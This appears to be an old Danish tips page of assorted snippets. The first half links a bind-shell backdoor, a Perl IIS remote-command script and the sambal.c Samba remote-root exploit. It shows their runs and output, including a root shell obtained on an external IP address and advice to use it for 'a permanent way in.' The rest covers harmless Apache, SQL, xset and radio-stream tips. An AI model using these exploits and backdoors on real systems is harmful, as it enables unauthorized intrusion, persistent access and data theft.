client : http://base.fujang.dk/files/mike/contty.c
Server : http://base.fujang.dk/files/mike/bindtty.c
Start the server like:
root@banana:~# ./bindtty
Daemon is starting…OK, pid = 148
And connect to it like:
root@banana:~# ./contty 127.0.0.1
Trying 127.0.0.1:4000…
Connected to 127.0.0.1.
Escape character is ‘^]’
[ut@banana /]#
http://base.fujang.dk/files/mike/runshit.pl
peanut# ./runshit.pl 10.1.1.3:80 dir%20c:\\
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 29 May 2003 12:21:35 GMT
Content-Type: application/octet-stream
Disken i drev C har ikke noget navn.
Diskens serienummer er E482-DA7D
Indhold af c:\
25-05-2003 22:33 <DIR> Documents and Settings
29-05-2003 12:04 <DIR> Inetpub
26-05-2003 00:37 <DIR> jgc330b3
29-05-2003 00:35 91 LogiSetup.log
29-05-2003 12:33 <DIR> Programmer
29-05-2003 13:56 600 PUTTY.RND
26-05-2003 22:50 <DIR> SIMS
26-05-2003 21:23 <DIR> totalcmd
29-05-2003 12:35 <DIR> WINNT
2 fil(er) 691 byte
7 mappe(r) 321.241.088 byte ledig
http://base.fujang.dk/files/mike/sambal.c
Taken from :http://www.greyhat.org/exploits/2003/april/sambal.c
peanut# ./sambal -b 0 -v 80.196.128.94
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
————————————————————–
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Recieved a non session message
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Recieved a non session message
+ Recieved a non session message
+ Worked!
————————————————————–
*** JE MOET JE MUIL HOUWE
Linux ricecrispy 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
uid=0(root) gid=0(root) groups=99(nogroup),98(nobody)
Now you have a ghost shell, you can type commands and send keystrokes til the command but it wont act like a regulare terminal, but enough for creating a permanent way in.
By padde
<padde> mike_: faktisk kan du smide en ny firmware på dit kort, så det bliver til gold.
<padde> mike_: http://beastie.dk/tmp/128bit_flash_810.zip 😉
http://beastie.dk/tmp/128_driver_orinoco742.zip
To find a cell contain a specific word you can use the following line in sql.
“select * from tabel where felt like \”%$variable%\” order by felt”
// Vladimirr – Vladimirr.dk
use: xset s off If you want to learn more, please refer to "man xset" // Vladimirr - Vladimirr.dk
use: xset s off
If you want to learn more, please refer to “man xset”
// Vladimirr – Vladimirr.dk
boogie mplayer mms://drlive.dr.dk/e06ch1kb64
electric mplayer mms://drlive.dr.dk/e05ch2kb64
ghetto mplayer mms://drlive.dr.dk/e05ch1kb64
klasisk player mms://drlive.dr.dk/e06ch2kb64
p1 mplayer mms://drlive.dr.dk/e07ch1kb64
p3 mplayer mms://drlive.dr.dk/e07ch2kb64
di mplayer http://160.79.1.141:8780
The version header is defined in ./include/ap_release.h in the apaceh2 source tree if you want to limit the number of information there is a option for that in the httpd.conf
More info later if required
To activate virtualhosts write, in the end of the httpd.conf :
NameVirtualHost *
And after that you can add virtualhosts with this syntax, just make sure the dns names points to your servers ip:
<VirtualHost *>
Documentroot /home/subdomain
ServerName subdomain.cyberfamily.dk
Serveralias www.subdomain.cyberfamily.dk
ScriptAlias /cgi-bin/ "/home/subdomain/cgi-bin"
</VirtualHost>
Documentroot , tells apache where the .html files will be
ServerName , tells what name apache should call itself when a users requests a page from the virtualdomain
Serveralias , tells apache an alias for the vhost, for an instance www.
ScriptAlias , tells apache where to find cgi-scripts for vhost